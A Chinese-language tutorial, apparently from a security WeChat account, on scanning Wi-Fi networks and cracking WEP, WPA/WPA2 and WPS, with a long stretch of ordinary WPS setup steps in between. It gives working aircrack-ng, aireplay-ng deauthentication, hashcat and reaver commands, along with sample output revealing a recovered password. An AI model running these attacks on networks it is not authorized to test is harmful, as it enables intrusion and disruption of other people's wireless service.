微信公众号：计算机与网络安全扫描无线网络是黑客最经常攻击的目标，一旦黑客成功入侵了无线网络，造成的危害极大要入侵一个网络，首先需要进行网络扫描，查看附近的无线网络，然

 

微信公众号：计算机与网络安全扫描无线网络是黑客最经常攻击的目标，一旦黑客成功入侵了无线网络，造成的危害极大要入侵一个网络，首先需要进行网络扫描，查看附近的无线网络，然后找准目标进行一系列的攻击手段扫描网络的工具分为主动式和被动式，主动式扫描是指向目标主机发送“探测请求”数据分组，而被动式扫描相对主动式扫描来说更有优势，被动式扫描一般是在特定的信道上监听无线信号发送的任意数据分组，进行进一步分析。

1. 主动式扫描主动式扫描工具通常会周期性地发出一些探测请求数据分组而客户端在查找网络的时候，也会发送探测请求的数据分组，探测请求既能让客户端寻找一个特定的网络，又能让客户端找到所有的网络而大多数主动扫描工具只能找到“操作系统能通过主动扫描找到的网络”，因此，主动扫描并不比操作系统自带的更有效。

更重要的是，如果一个网络隐藏了自身的SSID，主动式扫描器就很难扫描到它，但是被动式扫描器如果多花一些步骤，还是能找到这个无线网络常用的主动式扫描工具有Vistumbler，这是Windows操作系统下一个不错的主动式扫描工具，它利用Vista的命令来获取无线网络信息。

>netsh wlan show networks mode=bssidVistumbler算是一款较新的开源扫描程序，Vistumbler能搜寻到计算机附近所有的无线网络，并且在上面附加信息，如活跃程度、MAC 地址、SSID、信号强度、频道、认证、加密和网络类型。

它可显示基本的 AP 信息，包括精确的认证和加密方式，甚至可显示 SSID和RSSIVistumbler还支持GPS设备，与当地不同的Wi-Fi网络连接，输出其他格式的数据2. 被动式扫描简单来说，被动式扫描就是被动监听，被动式扫描工具与主动式扫描工具不同，它自身是不会发送数据分组的。

但被动式扫描工具的效果一般要比主动式扫描工具更好被动式扫描需要将无线网卡置于Monitor模式，即监测模式无线网卡可以工作在多种模式之下，常见的有Master、Ad-hoc、Managed 、Monitor等模式。

Master又称主模式，一些高端无线网卡支持主模式这个模式允许无线网卡使用特制的驱动程序和软件工作，作为其他设备的WAPAd-hoc又称IBSS模式，是指在网络中没有可用AP时，两台或更多主机可以进行互联，从而进行通信。

Managed又称被管理模式，是默认模式，即当无线客户端连入AP后就使用的这个模式，在这个模式下，无线网卡只专注于接收从WAP发给自己的数据报文Monitor 又称监听模式，此时的无线客户端停止收发数据即无法上网，专心监听当前频段内的数据分组，就可以通过Wireshark来捕获别人的无线数据分组了。

图1更直接地介绍了各个模式如何进行工作。

图1  无线网卡多种模式我们可以用Airmon-ng工具使无线网卡进入Monitor模式使用Airmon-ng来开启无线网卡的Monitor模式是十分方便的，且成功率较高首先使用airmon-ng check kill命令杀死会影响Aircrack-ng的进程，如network-manager。

然后使用airmon-ng start wlan0命令可开启无线网卡的Monitor模式，wlan0是无线网卡的名称，可以通过ifconfig来进行查看，如图2所示

图2  查看无线网卡然后使用Airmon-ng来开启wlan0的Monitor模式，如图3所示。

图3  开启Monitor模式再来查看一下现在状态的无线网卡，一般开启后的无线网卡会重新命名成原来的名字+mon，意思就是该无线网卡是Monitor模式，如图4所示。

图4  开启后的无线网卡现在无线网卡已经是处于了Monitor模式了，但是现在主机已经不能上网了，下面介绍一下这时需要重新上网的操作，首先将刚刚开启的wlan0mon停下，然后开启network-service就可以重新上网了，如图5所示。

图5  重新上网开启了无线网卡的Monitor模式之后，被动式扫描工具就可以大显神威了常用的被动式扫描工具如下AirPcap工具AirPcap是Windows平台上的无线分析、嗅探与破解工具，用来捕获并分析802.11 a/b/g/n的控制、管理和数据帧。

所有的AirPcap适配器工作于完全被动模式下，在这种模式下，AirPcap 可以捕获一个频道中的所有帧，包括数据帧、控制帧和管理帧如果多个BSS共用一个频道，那么只要在工作距离内，AirPcap就可以捕获这一频道中的所有BSS的数据帧、控制帧、管理帧。

AirPcap 适配器在同一个时间内只能捕获一个频道的数据根据适配器功能的不同，用户可以在AirPcap控制面板或Wireshark中的AdvancedWireless Settings对话框设定捕获不同的频道。

AirPcap适配器可以设定捕获任何有效的802.11无线分组KisMAC 工具KisMAC 是一个开源的无线应用，专为Mac OS 设计，它使用 Monitor模式和被动扫描Kismet工具Kismet是一个基于Linux的无线网络扫描程序，使用该工具可以测量周围的无线信号，并查看所有可用的无线接入点。

但在Linux操作系统下，使用最多的是Airodump-ng，Airodump-ng是Aircrack-ng这个强大的无线套件下捆绑的一个小组件，使用起来非常方便，只需要一条指令就可以探测周围的无线网络。

在没有开Monitor模式下，在终端输入指令airodump-ng wlan0是可以扫描网络的，当前网络中的无线Wi-Fi，如图6所示。

图6  当前网络中的无线Wi-Fi在图6中可以看到，无线网卡wlan0一直处于不稳定状态，因此，最好在开启Monitor模式后再去使用Airodump-ng，这样无线网卡不会一直处于up和down的状态，图7是在Monitor模式下使用Airodump-ng。

图7  Monitor模式下使用Airodump-ng上文提到的各个参数描述如下BSSID(Basic Service Set Identifier)：AP的MAC地址ESSID(The Extended Service Set Identifier)：。

AP的名称PWR(Power)：信号强度Beacons：AP发出的通告编号，每个接入点（AP）在最低速率（1 Mbit/s）时差不多每秒会发送10个左右的beacon，所以它们能在很远的地方就被发现#Data：

当前数据传输量#/s：过去10 s内每秒捕获数据分组的数量CH(Channel)：AP所在的频道MB：AP的最大传输速度MB=11=>802.11b，MB=22=>802.11b+，MB>22=>802.11g。

后面带“.”的表示短封分组标头，处理速度快，更利于破解ENC(Encryption)：使用的加密算法体系CIPHER：检测到的加密算法AUTH(Authority)：认证方式WEPWEP（Wired Equivalent Privacy）协议是对在两台设备间无线传输的数据进行加密的方式，用以防止非法用户窃听或侵入无线网络。

单从英文名字上看，WEP 似乎是一个针对有线网络的安全加密协议，其实并非如此WEP标准在无线网络出现的早期就已创建，它是无线局域网WLAN的必要的安全防护层WEP于1997年9月被批准作为Wi-Fi安全标准。

即使在当时那个年代，第一版WEP的加密强度也不算高，因为美国对各类密码技术的限制，导致制造商仅采用了 64 位加密当该限制解除时，加密强度提升至128位尽管后来引入了256位WEP加密，但128位加密仍然是最常见的加密。

尽管进行了种种改进、变通或支撑WEP系统的尝试，但它仍然非常脆弱，依赖WEP的系统应该进行升级，如果不能进行安全升级，建议更换新产品Wi-Fi 协会于 2004年宣布WEP正式退役在无线路由器中可以选择加密方式，如图1所示。

图1  无线路由器选择加密方式1. WEP的不安全性WEP使用RC4加密算法，这是一个流密码流密码的原理是将一个短密钥扩展为一个无限的伪随机密钥流发送者通过将密钥流与明文进行XOR操作得到密文接收者拥有同样的短密钥，使用它可以得到同样的密钥流。

将密钥流与密文进行XOR操作，即可得到原来的明文这种操作模式使流密码容易遭受几个攻击如果攻击者翻转了密文中的一位，解密之后，明文中的相应位也将被翻转此外，如果窃听者截获到了两份使用相同密钥流加密的密文，则他也能够知道两个明文的XOR结果。

已知XOR可以通过统计分析恢复明文统计分析随着更多使用相同密钥流加密的密文被截获而变得更实用一旦其中一个明文已知，很容易就可以恢复所有其他的WEP加密技术存在重大漏洞，这一点在2001年8月就已经广为人们所知。

密码学家Scott Fluhrer、ItsikMantin以及Adi Shamir在一篇论文中指出了RC4编码的缺点因此，攻击者能够在一定程度可以成功破解这个安全密钥在2005年，Andreas Klein发表了另一篇RC4流密码研究的论文，证明在RC4的密钥流之间存在更多的关系。

达姆施塔特大学的 Boffins 利用这个思想进行了实验，结果证明，仅使用40000个捕获的数据分组就可以在半数情况下破解104位WEP安全密钥Boffins表示，捕获到的数据分组越多，就更容易获得这个安全密钥。

通过截取85000个数据分组，他们破解该密钥的成功率高达95%捕获40000个数据分组可以在不到1min 内就可完成，而对其破解的时间，在一台Pentium 1.7 GHz的处理器上大约为3 s左右要还原出WEP密码的关键是要收集足够的有效数据帧，从这个数据帧里可以提取IV值和密文。

与密文对应的明文的第一个字节是确定的，它是逻辑链路控制的 802.2 头信息通过这一个字节的明文和密文，我们做 XOR 运算能得到一个字节的 WEP 密钥流，由于 RC4流密码产生算法只是把原来的密码给打乱的次序。

所以获得的这一个字节的密码就是IV+P6ASSWORD的一部分但是由于RC4的打乱，不知道这一个字节具体的位置和排列次序当收集到足够多的 IV 值和碎片密码时，就可以进行统计分析运算了用上面的密码碎片重新排序，配合IV使用RC4算法得出的值和多个流密码位置进行比较，最后得到这些密码碎片正确的排列次序，这样，WEP的密码就被分析出来了。

简单地说，获取到的数据分组越多，破解的概率越大，破解的速度越快2. 破解WEP因为WEP的不安全性，因此破解WEP成为了很容易的事情，也有很多软件能直接破解WEP加密的Wi-Fi，下面介绍如何破解WEP加密的Wi-Fi。

在有流量即该无线环境下有客户连接并且有网络流量的情况下，那么破解 WEP 就成为几秒钟的事情了在此，在Kali Linux系统下使用一个集成了指令的小工具，这样就不需要自己来记指令Wifite是一款自动化WEP、WPA破解工具，不支持Windows和Mac OS。

Wifite集成了Aircrack-ng套件的指令，只需简单的配置即可自动化运行，期间无需人工干预，特点是可以同时攻击多个采用WEP和WPA加密的网络只要在终端输入wifite即可自动进入网卡的Monitor模式，并开始检测扫描附近的无线网络，如图2所示。

图2  进入Monitor模式并扫描附近的网络在选定目标以后按下Ctrl+C键，然后输入选定的目标序号，如图3所示。

图3  输入目标序号然后Wifite就会自动开始抓取数据分组，并进行破解。在大概抓取到超过10000个数据分组以后，基本就能成功破解了，用时约1min，如图4所示。

图4  成功破解示意上面介绍的这款小工具在有大量流量的时候是非常好用的，这样就能快速地破解无线密码了，也可以破解WPAWPA1. WPA简介由于WEP的安全性较低，IEEE 802.11组织开始制定新的安全标准，也就是802.11i协议。

但由于新标准从制定到发布需要较长的周期，而且用户也不会仅为了网络的安全性就放弃原来的无线设备，所以无线产业联盟在新标准推出之前，又在 802.11i 草案的基础上制定了WPA（Wi-Fi Protected Access）无线加密协议。

WPA使用临时密钥完整性协议（TKIP，Temporal Key Integrity Protocol），它的加密算法依然是WEP中使用的RC4加密算法，所以不需要修改原有的无线设备硬件WPA针对WEP存在的缺陷，如 IV 过短、密钥管理过于简单、对消息完整性没有有效的保护等问题，通过软件升级的方式来提高无线网络的安全性。

WPA为用户提供了一个完整的认证机制，AP或无线路由根据用户的认证结果来决定是否允许其接入无线网络，认证成功后可以根据多种方式（传输数据分组的多少、用户接入网络的时间等）动态地改变每个接入用户的加密密钥。

此外，它还会对用户在无线传输中的数据分组进行MIC编码，确保用户数据不会被其他用户更改作为802.11i标准的子集，WPA的核心就是IEEE802.1x和TKIPWPA标准于2006年正式被WPA2 取代。

WPA和WPA2之间最显著的变化之一是强制使用AES算法和引入CCMP（计数器模式密码块链消息完整码协议）替代TKIP目前，WPA2系统的主要安全漏洞很不明显（漏洞利用者必须进行中间人模式攻击，从网络内部获得授权，然后延续攻击网络上的其他设备）。

因此，WPA2的已知漏洞几乎都限制在企业级网络，所以，讨论WPA2在家庭网络上是否安全没有实际意义不幸的是，WPA2也有着与WPA同样的致命弱点——Wi-Fi保护设置（WPS）的攻击向量尽管攻击WPA/WPA2保护的网络，需要使用现代计算机花费2～14 h持续攻击，但是我们必须关注这一安全问题，用户应当禁用WPS（如果可能，应该更新固件，使设备不再支持WPS，由此完全消除攻击向量）。

2. 破解WPA接下来尝试在没有大量流量的情况下破解WPA为了更好地理解破解的过程，不再使用集成了Aircrack-ng的Wifite，直接使用这个强大的Aircrack-ng套件来进行WEP破解首先开启无线网卡的Monitor模式，然后使用Airodump-ng wlan0mon寻找合适的目标，记录下目标的BSSID和信道。

这里就以smart为例，如图1所示BSSID：28:6C:07:3E:ED:CACH：1root@kail:～# airodump-ng--bssid28:6C:07:3E:ED:CA-c 1-w smart wlan0mon

图1  获取BSSID和信道可以看到有一个用户连接，但是捕捉数据分组的速度非常的慢，可见这个用户并没有在上网，因此不能获得大量流量现在我们使用这个用户的BSSID来进行模拟发送数据分组，这样可以更快地取得数据分组。

root@kali:～#aireplay-ng-0 0-a 28:6C:07:3E:ED:CA-h 3C:46:D8:4D:0F:5D wlan0mon-0 模式是指 Deauthentication（取消认证），向客户端发送数据分组，让客户端误以为是AP 发送的数据。

而后面的数字 0 是指无尽发送，当然也可以指定发送的数据分组，选择无尽模式去发送是为了更快地获取握手分组如图2所示，可以看到发送了大量的数据分组。

图2  发送大量数据分组然后回到Airodump-ng的页面，可以看到Frames数量在不断上升，在获得了握手分组后，就可以停止Aireplay-ng的分组发送行为了，如图3所示。

图3  获取握手分组然后获得了smart的cap分组，这里可以使用Aircrack-ng来进行跑包，但是取决于密码在字典中的位置，也可以自己制作字典，由于目前的WPA2加密的密码长度可以设置得很长，因此破解需要时间。

我们先使用aircrack-ng来跑一个常用字典，命令如下root@kali:～#aircrack-ng-w rockyou.txt smart-01.cap这里的01是系统在设定了-w smart后自动生成的，因为可能之后还会捕捉分组，系统用以区分这是第几次捕捉分组。

如图4所示，密码在字典里，并且密码在字典的很前面

图4  WPA破解3. 密码破解Aircrack-ng 是使用 CPU 来破解的，如果运气不好，可能一个字典分组就要跑上好几个小时，这样的速度太慢了，这时可以借助显卡的计算速度来进行 GPU跑包，这样速度可以获得几倍的提升。

借助GPU跑包可以使用更短的时间，可以说GPU是跑包的好手，但是CPU是集大成者，它能做的事情非常多，因为杂，所以慢，因为还要处理其他事项，因此，越来越多的人开始使用GPU来跑包Hashcat号称是如今最快的跑包软件。

以前Hashcat分为Hashcat、Oclhashcat、Cudahashcat，Hashcat使用CPU跑包，而后两者是使用GPU跑包不过目前这三者合并为Hashcat，并且官网上也不再提供其他两者的下载。

Hashcat 是一款在 github 上开源的密码破解软件，号称是世界上最快的密码破解者，也是世界上第一个也是唯一的内核规则引擎Hashcat系列软件在硬件上支持使用CPU、NVIDIA GPU、ATI GPU来进行密码破解。

在操作系统上支持 Windows、Linux 平台，并且需要安装官方指定版本的显卡驱动程序，如果驱动程序版本不对，可能导致程序无法运行如果要搭建多GPU破解平台的话，最好是使用Linux系统来运行Hashcat系列软件，因为在Windows下，系统最多只能识别4张显卡。

并且，Linux下的VisualCL技术，可以轻松地将几台机器连接起来，进行分布式破解作业在破解速度上，ATI GPU破解速度最快，使用单张HD7970破解MD5可达到9000 Mbit/s的速度，其次为NVIDIA显卡，同等级显卡GTX690破解速度大约为ATI显卡的。

，速度最慢的是使用CPU进行破解。Hashcat支持绝大多数的密码破解，在其帮助页面列出了所有支持的密码类型，如图5所示。

图5  Hashcat支持的密码类型Hashcat 支持使用字典跑包，也支持自定义密码格式跑包，并且可以自定义规则，其用法太多，在此不做赘述。下图是官方提供的例子，如图6所示。

图6  Hashcat官方示列在使用Hashcat破解WAP/WAP2时，需要先将cap文件转换成hccap文件我们可以使用Aricrack-ng来进行转换，如图7所示root@kail:～# aircrack-ng smart.cap-J smart。

图7  Hashcat破解WAP/WAP2WPSWPS是由Wi-Fi联盟所推出的全新Wi-Fi安全防护设定（Wi-Fi Protected Setup）标准，推出该标准的主要原因是为了解决长久以来无线网络加密认证设定的步骤过于繁杂、艰难的问题。

使用者往往会因为步骤太过麻烦，以致干脆不做任何加密安全设定，因而引发许多安全上的问题WPS用于简化Wi-Fi无线的安全设置和网络管理它支持两种模式：个人识别码（PIN）模式和按钮（PBC）模式WPS是由Wi-Fi联盟组织实施的认证项目，主要致力于简化无线局域网的安装及安全性能配置工作。

在支持WPS（QSS或AOSS）的无线路由器上，用户不需要输入无线密码，只需输入PIN码或按下按钮（PBC），就能安全地连入WLAN但是使用PIN码连接无线路由器的过程是可以暴力破解的，WPS的PIN码是一个8位的纯数字，第8位数是一个校验和（checksum），根据前7位数算出，而在PIN验证时，PIN码的前4位和PIN码的接下来3位是分开验证的，因此，暴力破解PIN码的过程中，只需要尝试11 000（104+103）次就可以解出PIN码，然后通过PIN连接路由器抓取到无线密码。

暴力破解PIN码时使用的工具为reaver或inflator（图形化reaver），工具可以对周围的无线网络进行扫描，并将开启WPS功能的无线信号标记出来，在选择好暴力破解的目标后，调用reaver命令行进行破解，如果路由器性能不错且信号比较好，破解一个PIN码的时间为2～4 s，所以可算出破解出无线密码的最高时间成本为9.17 h。

弱一点的路由器在破解过程中会出现死机，这时就要等一段时间，待路由器性能稳定后再进行破解一、WPS简介WPS在有些路由器中叫做QSS（如TP-LINK）它的主要功能就是简化了无线网络设置及无线网络加密等工作。

1、什么是WPS加密WPS加密就是使客户端连接WiFi网络时，此连接过程变得非常简单只需按一下无线路由器上的WPS键，或者输入一个PIN码，就能快速的完成无线网络连接，并获得WPA2级加密的无线网络WPS支持两种模式，分别是个人识别码（PIN，Pin Input Configuration）模式和按钮（PBC，Push Button Configuration）模式。

2、WPS工作原理可以将WPS认证产品的配置及安全机制，想象成“锁”和“钥匙”该标准自动使用注册表为即将加入网络的设备分发证书将新设备加入WLAN的操作可被当做将钥匙插入锁的过程，即启动配置过程并输入PIN码或按PBC按钮。

此时，WPS启动设备与注册表之间的信息交换进程，并由注册表发放授权设备，加入WLAN的网络证书（网络名称及安全密钥）随后，新设备通过网络在不受入侵者干扰的情况下进行安全的数据通信，这就好像是在锁中转动钥匙。

信息及网络证书通过扩展认证协议（EAP）在空中安全交换，该协议是WPA2使用的认证协议之一此时系统将启动信号交换进程，设备完成相互认证，客户端设备即被连入网络注册表则通过传输网络名（SSID）及WPA2“预共享密钥（PSK）”启动安全机制。

由于网络名称及PSK由系统自动分发，证书交换过程几乎不需用户干预WLAN安全设置的锁就这样被轻松打开了3、WPS的漏洞WPS的设置虽然带来了很大的方便，但是安全方面存在一定的问题这是由于PIN码验证机制的弱点导致的网络的不安全。

PIN码是有8位十进制数构成，最后一位（第8位）为校验位（可根据前7位算出）验证时先检测前4位，如果一致则反馈一个信息，所以只需一万次就可完全扫描一遍前4位，pin时速度最快为2s/pin当前4位确定后，只需再试1000次可破解出接下来的3位），校验位可通过前7位算出。

这样，即可暴力破解出PIN码4、WPS的优点和缺点（1）优点● WPS能够在网络中为接入点及WPS客户端设备自动配置网络名（SSID）及WPA安全密钥● 当连接WPS设备时，用户没有必要去了解SSID和安全密钥等概念。

● 用户的安全密钥不可能被外人破解，因为它是随机产生的● 用户不必输入预知的密码段或冗长的十六进制字符串● 信息及网络证书通过扩展认证协议（EAP）在空中进行安全交换，该协议是WPA2使用的认证协议之一。

（2）缺点● WPS是不支持设备不依靠AP而直接通信的Ad hoc网络● 网络中所有的Wi-Fi设备必须通过WPS认证或与WPS兼容，否则将不能利用WPS简化网络安全配置工作● 由于WPS中的十六进制字符串是随机产生的，所以很难在WPS网络中添加一个非WPS的客户端设备。

● WPS并非所有厂商都支持二、设置WPS如果要进行WPS加密破解，则首先需要确定AP是否支持WPS，并且该AP是否已开启该功能目前，大部分路由器都支持WPS功能如果要是有WPS方式连接WiFi网络，则无线网卡也需要支持WPS功能。

1、开启WPS功能在设置WPS之前，首先要确定在AP上已经开启该功能WPS功能在某些AP上叫做WPS，在某些设备上叫做QSS下面以TP-LINK路由器（AP）为例，介绍开启WPS功能的方法在TP-LINK路由器上开启WPS功能。

具体操作步骤如下所述：（1）登录路由器本例中该路由器的IP地址是192.168.2.1，登录的用户名和密码都是admin（2）登录成功后，在打开界面的左侧有一个菜单栏在左侧的菜单栏中选择“QSS安全设置”，将显示如图1所示的界面。

图1  QSS安全设置（3）从该界面可以看到，当前路由器的QSS功能是关闭的。此时在该界面单击“启用QSS”按钮，将弹出如图2所示的界面。

图2  注意对话框（4）该界面显示的信息，提示用户需要重新启动路由器才可使配置生效。这里单击“OK”按钮，将显示如图3所示的界面。

图3  重启使配置生效（5）在该界面可以看到有一行红色的字，要求重启路由器。这里单击“重启”链接，将显示如图4所示的界面。

图4  重启路由器（6）在该界面单击“重启路由器”按钮，将弹出如图5所示的界面。

图5  确认重启路由器（7）该界面提示用户确认是否重新启动路由器。这里单击OK按钮，将显示如图6所示的界面。如果用户还需要设置其他配置，可以单击Cancel按钮取消重启路由器。

图6  正在重新启动路由器（8）从该界面可以看到，正在重新启动路由器，并且以百分比的形式显示了启动的进度当该路由器重新启动完成，前面的配置即生效也就是说，当前路由器的WPS功能已开启，如图7所示

图7  开启WPS功能（9）从该界面可以看到WPS（QSS）功能已经开启了2、在无线网卡上设置WPS加密要在无线网卡上设置WPS加密，则需要先确定该无线网卡是否支持WPS加密通常支持802.11 n模式的无线网卡，都支持WPS功能。

并且在某些USB无线网卡上，直接自带了QSS按钮功能（如TP-LINK TL-WN727N）下面介绍如何在无线网卡上设置WPS加密以芯片为3070的USB无线网卡为例，介绍设置WPS加密的方法不管使用哪种无线网卡设置WPS加密，都需要在当前系统中安装该网卡的驱动，然后才可以进行设置。

这里介绍安装芯片3070的无线网卡驱动具体操作步骤如下所述（1）下载无线网卡3070驱动，其驱动名为RT3070L.exe。（2）开始安装驱动。双击下载好的驱动文件，将显示如图8所示的界面。

图8  许可证协议（3）该界面显示了安装RT3070L.exe驱动文件的许可证协议信息，这里选择“我接受许可证协议中的条款”复选框。然后单击“下一步”按钮，将显示如图9所示的界面。

图9  安装类型（4）在该界面选择安装类型，这里选择默认的“安装驱动程序与Ralink无线网络设定程序”类型。然后单击“下一步”按钮，将显示如图10所示的界面。

图10  开始安装驱动（5）此时将开始安装驱动文件，要注意该界面的注意信息如果当前系统中安装有杀毒软件，该驱动可能安装不完全，建议在安装该驱动文件时先将杀毒软件关闭然后单击“安装”按钮，将显示如图11所示的界面。

图11  安装驱动（6）从该界面可以看到，此时正在安装驱动文件，并显示有进度条。当安装完成后，将显示如图12所示的界面。

图12  安装完成（7）从该界面可以看到，该驱动已经安装完成。此时单击“完成”按钮，退出安装程序。这时候将在电脑右下角任务栏会出现一个

驱动图标，表明驱动安装成功。在某些操作系统中，将网卡插入后会自动安装该驱动。如果默认安装的话，同样在任务栏会出现

驱动图标可以直接单击该图标进行设置通过以上的步骤无线网卡的驱动就安装完成了，接下来设置WPS加密方式，使网卡接入到WiFi网络设置WPS加密可以使用PIN码和按钮两种方法，下面分别介绍这两种方法的使用首先介绍使用PIN码的方法连接到WiFi网络，具体操作步骤如下所述。

（1）双击

驱动图标，将出现如图13所示的界面。

图13  Ralink设置界面（2）在该界面单击第三个图标

（连线设定），将打开连线设定列表界面，如图14所示。

图14  连线设定列表（3）在该界面单击

（新增WPS连线设定）图标，将打开如图15所示的界面。

图15  选择连接方式（4）在该界面显示了WPS的两种连接方式，这里选择PIN连线设定方式，并且选择连接的AP，如图15所示。设置完后，单击

（下一步）按钮，将显示如图16所示的界面。

图16  选择连线设定模式（5）在该界面选择连线设定模式该驱动默认支持“登录者”或“受理注册机构”两种模式当使用“登录者”模式时，可以单击“更新8码”按钮来重新产生一组PIN码；如果使用“受理注册机构”时，会要求输入一组PIN码。

这里选择“受理注册机构”，从该界面可以看到有一组PIN码此时，记住这里产生的PIN码，该PIN码需要在路由器中输入然后单击

（下一步）按钮，将显示如图17所示的界面。

图17  连线设置（6）该界面将开始连接WiFi网络但是，在连接之前需要先将该网卡的PIN码添加到路由器中才可连接所以，此时在路由器的QSS安全设置界面单击“添加设备”按钮，将显示如图18所示的界面

图18  输入添加设备的PIN码（7）在该界面输入获取到的无线网卡的PIN码。然后单击“连接”按钮，将显示如图19所示的界面。

图19  正在连接设备（8）从该界面可以看到，路由器正在连接输入的PIN码的设备此时，返回到图17界面单击“开始PIN”与AP建立连接该连接过程大概需要两分钟当建立连接成功后，路由器和Ralink分别显示如图20和图21所示的界面。

图20  添加设备成功

图21  连线设定列表（9）从该界面可以看到，成功连接了网络名称为Test的WiFi网络，并且可以看到连接到AP的详细信息，如验证方法和加密方法等在Ralink的启动界面可以看到，主机获取到的IP地址、子网掩码、频道及传输速度等，如图22所示。

图22  客户端获取到的信息（10）从该界面可以看到当前主机获取到的详细信息，并且从左侧的图标也可以看到，当前网络为加密状态，无线信号也连接正常以上步骤就是使用WPS的PIN码连接WiFi网络的方法接下来，介绍如何使用按钮方式连接到WiFi网络。

具体操作步骤如下所述（1）双击

驱动图标打开Ralink设置界面，如图23所示。

图23  Ralink设置界面（2）在该界面单击

（新增WPS连线设定）图标，将打开如图24所示的界面。

图24  连线设定列表（3）在该界面单击

（新增WPS连线设定）图标，将打开如图25所示的界面。

图25  选择连接方式（4）在该界面选择“PBC连线设定方式”复选框，然后单击

（下一步）按钮，将显示如图26所示的界面。

图26  连线设置（5）在该界面单击“开始PIN”按钮，将开始连接WiFi网络，如图27所示。

图27  连接AP（6）此时，按路由器上的QSS/RESET按钮，如图28所示。

图28  按路由器上的QSS按钮（7）按一下路由器上的QSS/RESET按钮后，返回到Ralink连线设定界面。如果无线网卡成功连接到WiFi网络，将看到如图29所示的界面。

图29  成功连接到WiFi网络3、在移动客户端上设置WPS加密上面介绍了在无线网卡上设置WPS加密的方法但是，通常人们会使用一些移动设备连接WiFi网络，如手机和平板电脑等下面介绍在移动客户端上设置WPS加密的方法。

目前，大部分Android操作系统的手机客户端都支持WPS功能但是，不同型号的客户端的设置方法可能不同下面分别以小米手机和原道平板电脑客户端为例，介绍设置WPS加密的方法（1）在小米手机上设置WPS加密。

在小米手机客户端设置WPS加密，并且使用输入PIN码方法连接到WiFi网络。具体操作步骤如下所述。1）打开手机的WLAN设置，将显示如图30所示的界面。

图30  WLAN设置界面2）在该界面可以看到搜索到的所有无线信号，这些无线信号需要输入WiFi的加密密码才能连接到网络这里是使用WPS的方式进行连接，所以选择“高级设置”选项，将显示如图31所示的界面。

图31  高级WLAN设置3）该界面显示了高级WLAN的设置项，在该界面底部可以看到有一个“快速安全连接”选项在快速安全连接下面有两种方法可以快速连接到WiFi网络其中“连接WPS”选项，是使用按钮方式连接到WiFi网络；“WPS PIN输入”选项是使用PIN码输入方式连接到WiFi网络。

这里先介绍使用PIN码输入方法，选择“WPS PIN输入”选项，单击该选项后，将显示如图32所示的界面

图32  连接WPS4）在该界面可以看到，该手机客户端网卡的PIN码是76573224此时登录到路由器，并且在路由器的QSS安全设置选项中添加该设备的PIN码添加该PIN码后，显示界面如图33所示

图33  添加设备的PIN码5）在该界面添加手机客户端的PIN码后，单击“连接”按钮。当手机客户端成功连接该WiFi网络后，将显示如图34所示的界面。

图34  成功连接到Test网络6）从该界面可以看到，该手机客户端已经成功连接到WLAN网络Test，并且在手机的右上角可以看到WiFi网络的信号强度此时，单击“确定”按钮，即可正常访问Internet。

以上是使用输入PIN码连接WiFi网络的方法。如果使用按钮方法连接WiFi网络，可以在手机客户端选择“连接WPS”选项，如图35所示。在该界面选择“连接WPS”选项后，将显示如图36所示的界面。

图35  高级WLAN设置界面

图36  连接WPS在该界面可以看到，正在连接开启WPS的WiFi网络，此时按路由器上的QSS/RESET按钮，客户端将成功连接到网络。连接成功后，将显示如图37所示的界面。

图37  成功连接到WiFi网络从该界面显示的信息中可以看到，已成功连接到Test的WiFi网络（2）在平板电脑上设置WPS加密下面以原道平板电脑为例，介绍设置WPS加密的方法这里首先介绍使用WPS的输入PIN码模式连接到WiFi网络的方法。

具体操作步骤如下所述1）在平板电脑中打开“设置”选项，并启用“无线和网络”选项，将显示如图38所示的界面。

图38  设置界面2）在该界面单击

选项，将弹出一个菜单栏，如图39所示。

图39  菜单栏3）在该界面可以看到，有一个“WPS PIN输入”选项，该选项就是用来使用PIN码连接WiFi网络的。单击“WPS PIN输入”选项后，将显示如图40所示的界面。

图40  平板电脑上网卡的PIN码4）从该界面可以看到，该平板电脑获取到的PIN码是09098060这时候在路由器的QSS安全设置界面，添加该PIN码值然后单击路由器上的“连接”按钮，当客户端连接成功后，将显示如图41所示的界面。

图41  成功连接到WiFi网络5）从该界面可以看到，该客户端已成功连接到WiFi网络Test在该平板电脑上也可以使用按钮的方式连接到WiFi网络下面介绍使用按钮方式连接到WiFi网络的方法，具体步骤如下所述。

1）打开“设置”界面，并启动“无线和网络”选项，如图42所示。

图42  设置界面2）在该界面单击

图标，将显示如图43所示的界面。

图43  正在连接WiFi网络3）从该界面可以看到，当前客户端正在连接WiFi网络。在客户端连接的过程中，按路由器上的QSS/RESET按钮，如图44所示。

图44  按路由器上的QSS/RESET按钮4）当客户端连接成功后，将显示如图45所示的界面。

图45  成功连接到WiFi网络5）从该界面可以看到，客户端已经成功连接到WiFi网络三、破解WPS加密前面对WPS的概念及设置进行了详细介绍通过前面的内容可以知道，使用WPS加密存在漏洞所以，可以利用该漏洞实施攻击。

在Kali Linux操作系统中，自带可以破解WPS加密的工具如Reaver、Wifite和Fern WiFi Cracker等下面介绍使用这几个工具进行WPS加密破解的方法1、使用Reaver工具Reaver是一个暴力破解WPS加密的工具。

该工具通过暴力破解，尝试一系列AP的PIN码该破解过程将需要一段时间，当正确破解出PIN码值后，还可以恢复WPA/WPS2密码下面介绍使用Reaver工具破解WPS加密的方法在使用Reaver工具之前，首先介绍该工具的语法格式，如下所示。

reaver -i -b -vv以上语法中几个参数的含义如下所示● -i：指定监听模式接口● -b：指定目标AP的BSSID● -vv：显示更多的详细信息。

该工具还有几个常用选项，下面对它们的含义进行简单地介绍如下所示● -c：指定接口工作的信道● -e：指定目标AP的ESSID● -p：指定WPS使用的PIN码● -q：仅显示至关重要的信息如果知道AP的PIN码时，就可以使用-p选项来指定PIN码，快速的进行破解。

但是，在使用Reaver工具之前，必须要将无线网卡设置为监听模式本例中的PIN码是04588306所以，可以实现秒破执行命令如下所示root@kali:～# reaver -i mon0 -b 8C:21:0A:44:09:F8 -p 04588306。

执行以上命令后可以发现，一秒的时间即可破解AP的密码输出的信息如下所示Reaver v1.4 WiFi Protected Setup Attack ToolCopyright (c) 2011, Tactical Network Solutions, Craig Heffner 。

[+] Waiting for beacon from 8C:21:0A:44:09:F8[+] Associated with 8C:21:0A:44:09:F8 (ESSID: Test)[+] WPS PIN: 04588306

[+] WPA PSK: daxueba![+] AP SSID: Test从输出的信息中可以看到，破解出AP的密码为daxueba!，AP的SSID号为Test如果不知道PIN码的话，暴力破解就需要很长的时间。

